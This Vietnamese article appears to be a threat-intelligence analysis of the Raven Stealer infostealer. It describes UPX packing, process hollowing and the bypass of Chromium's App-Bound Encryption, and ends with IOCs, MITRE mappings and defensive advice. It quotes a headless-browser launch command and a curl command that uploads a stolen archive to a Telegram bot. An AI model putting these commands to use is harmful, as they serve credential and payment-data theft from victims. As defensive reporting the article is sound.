Mã độc Raven Stealer đã xuất hiện như một phần mềm độc hại đánh cắp dữ liệu tinh vi và gọn nhẹ. Được phát triển bằng Delphi và C++, mã độc này nhắm mục tiêu vào các hệ thống Windows, tập trung vào việc trích xuất thông tin nhạy cảm. Các loại dữ liệu mục tiêu bao gồm thông tin đăng nhập, chi tiết thanh toán và dữ liệu tự động điền từ các trình duyệt dựa trên Chromium như Chrome và Edge.
Lần đầu tiên được phát hiện trên GitHub vào ngày 15 tháng 7 năm 2025, Raven Stealer hoạt động với mức độ tàng hình cao. Nó yêu cầu tương tác tối thiểu từ người dùng và sử dụng kiến trúc mô-đun để triển khai liền mạch.
Tổng Quan về Mã Độc Raven Stealer
Raven Stealer được quảng bá dưới danh nghĩa “mục đích giáo dục” thông qua một kênh Telegram có tên ZeroTrace. Mã độc này tích hợp khả năng trích xuất dữ liệu theo thời gian thực thông qua các bot Telegram. Điều này cho phép ngay cả những kẻ tấn công thiếu kinh nghiệm cũng có thể thực hiện các chiến dịch thu thập thông tin đăng nhập.
Các tệp nhị phân của nó được đóng gói bằng UPX để giảm kích thước và né tránh phát hiện tĩnh. Chúng thực thi vô hình mà không có bất kỳ yếu tố giao diện người dùng nào. Mã độc tận dụng các kỹ thuật như cửa sổ ẩn và process hollowing để vượt qua các biện pháp phòng thủ.
Theo báo cáo của Cyfirma, điều này đặt Raven Stealer vào vị trí một công cụ phổ biến trong không gian Malware-as-a-Service (MaaS). Nó có liên kết đến các biến thể tương tự như Octalyn Stealer từ cùng một nhóm ZeroTrace. Điều này cho thấy một chiến lược đa dạng hóa nhằm thống trị các thị trường bất hợp pháp cấp thấp. Thông tin chi tiết có thể được tìm thấy tại: Cyfirma: Raven Stealer Unmasked.
Cấu Trúc và Phân Tích Kỹ Thuật
Phân tích tĩnh các mẫu như RavenStealer.exe (MD5: 6237a776e38b6a60229ac12fc6b21fb3) và v8Axs07p.3mf.exe (MD5: f74ec376aa22ce0b0d55023d8877dc72) cho thấy một giao diện người dùng builder dựa trên Delphi. GUI này nhúng các token bot Telegram và ID chat trực tiếp vào payload, tạo ra các tên tệp ngẫu nhiên có 12 ký tự cho các stub được viết bằng C++.
Các giá trị entropy cao xác nhận việc đóng gói bằng UPX, điều này làm phức tạp quá trình đảo ngược kỹ thuật. Các tài nguyên nhúng lưu trữ thông tin đăng nhập bot dạng văn bản thuần dưới ID 102 và 103.
Kỹ Thuật Né Tránh và Tiêm Nhiễm Hệ Thống
Mã độc tiêm một PAYLOAD_DLL được mã hóa ChaCha20 vào các tiến trình trình duyệt bị tạm dừng. Nó sử dụng các syscall trực tiếp như NtAllocateVirtualMemory và NtWriteVirtualMemory, cho phép process hollowing phản xạ mà không cần ghi vào đĩa.
Kỹ thuật này bỏ qua tính năng mã hóa App-Bound Encryption (ABE) của Chromium bằng cách khởi chạy trình duyệt ở chế độ headless. Mã độc sử dụng các cờ như --no-sandbox và --disable-gpu, tạo điều kiện thuận lợi cho việc giải mã mật khẩu, cookie và dữ liệu thanh toán trong bộ nhớ.
# Ví dụ về các cờ được sử dụng để khởi chạy trình duyệt ở chế độ headless
chromium.exe --headless --disable-gpu --no-sandbox
Quy Trình Thu Thập và Đánh Cắp Dữ Liệu
Phân tích động cho thấy Raven Stealer liệt kê các tạo tác hệ thống, bao gồm ví tiền điện tử, ứng dụng khách VPN và nền tảng trò chơi. Dữ liệu bị đánh cắp được tổ chức trong các thư mục con %Local%\RavenStealer trước khi nén thành các kho lưu trữ ZIP với hậu tố là tên người dùng của nạn nhân.
Việc trích xuất dữ liệu xảy ra thông qua lệnh curl.exe gọi API /sendDocument của Telegram. Các kho lưu trữ chứa các tệp có cấu trúc như passwords.txt, cookies.txt, payment.txt và screenshot.png được truyền đi, phục vụ cho việc chiếm quyền phiên và khai thác tài chính.
# Ví dụ lệnh curl sử dụng để gửi dữ liệu lên Telegram API
curl -F document=@"path/to/archive.zip" "https://api.telegram.org/bot<BOT_TOKEN>/sendDocument?chat_id=<CHAT_ID>"
Chỉ Số Nhận Diện Mã Độc (IOCs)
Các chỉ số nhận diện (IOCs) là cần thiết để phát hiện và ngăn chặn mã độc Raven Stealer trong môi trường của bạn:
- MD5 Hashes:
6237a776e38b6a60229ac12fc6b21fb3(RavenStealer.exe)f74ec376aa22ce0b0d55023d8877dc72(v8Axs07p.3mf.exe)
- Tên tệp ngẫu nhiên: Các stub được tạo có tên tệp 12 ký tự ngẫu nhiên.
- Thư mục dữ liệu:
%Local%\RavenStealer\
Ánh Xạ Tới MITRE ATT&CK Framework
Raven Stealer sử dụng nhiều chiến thuật trong khung MITRE ATT&CK, nhấn mạnh chuỗi tấn công toàn diện của nó từ thực thi đến trích xuất dữ liệu:
- T1027 (Obfuscated Files or Information): Sử dụng kỹ thuật đóng gói UPX để che giấu tệp.
- T1564.003 (Hidden Window): Kỹ thuật cửa sổ ẩn để tránh bị phát hiện.
- T1083 (File and Directory Discovery): Khám phá tệp và thư mục để tìm kiếm thông tin đăng nhập và dữ liệu nhạy cảm.
- T1071 (Application Layer Protocol): Sử dụng Telegram API làm giao thức C2 (Command and Control) để trích xuất dữ liệu.
Chiến Lược Phòng Ngừa và Tăng Cường Bảo Mật Mạng
Việc phòng ngừa và giảm thiểu rủi ro từ Raven Stealer đòi hỏi các biện pháp bảo mật mạng đa tầng. Hoạt động âm thầm, thiết kế mô-đun và khả năng nhắm mục tiêu rộng rãi vào trình duyệt, ví điện tử và dịch vụ của Raven Stealer làm tăng tiềm năng đe dọa của nó. Do đó, cần có các biện pháp phòng thủ mạnh mẽ.
- Giám sát tệp thực thi: Theo dõi chặt chẽ các tệp thực thi được đóng gói bằng UPX, vì đây là một dấu hiệu phổ biến của Raven Stealer.
- Phát hiện khởi chạy trình duyệt bất thường: Cảnh báo khi phát hiện các phiên khởi chạy trình duyệt bất thường, đặc biệt là ở chế độ headless hoặc với các cờ đáng ngờ.
- Kiểm soát lưu lượng API Telegram: Giám sát và kiểm soát lưu lượng truy cập API Telegram bất thường từ hệ thống của bạn, có thể chỉ ra việc trích xuất dữ liệu.
- Phát hiện điểm cuối cho tiêm syscall: Triển khai các giải pháp EDR (Endpoint Detection and Response) để phát hiện và ngăn chặn các kỹ thuật tiêm syscall trực tiếp.
- Phân tích hành vi: Sử dụng phân tích hành vi để chống lại các kỹ thuật né tránh ảo hóa và phát hiện các hành vi đáng ngờ của tiến trình.
Thông Tin Về Nhóm Phát Triển
Mã độc Raven Stealer được cho là do nhóm ZeroTrace phát triển, một nhóm đã hoạt động từ ngày 30 tháng 4 năm 2025 trên Telegram và GitHub. Các nhà phát triển duy trì một trung tâm để cung cấp các bản cập nhật, hướng dẫn và biến thể. Họ sử dụng các thẻ tác giả được mã hóa cứng trong các tệp nguồn như RavenStealer.cpp.
Cơ sở hạ tầng này thay thế C2 truyền thống bằng tính năng ẩn danh của Telegram để phân phối dữ liệu thông qua bot. Điều này càng làm phức tạp việc theo dõi và ứng phó với các chiến dịch đánh cắp dữ liệu của chúng.
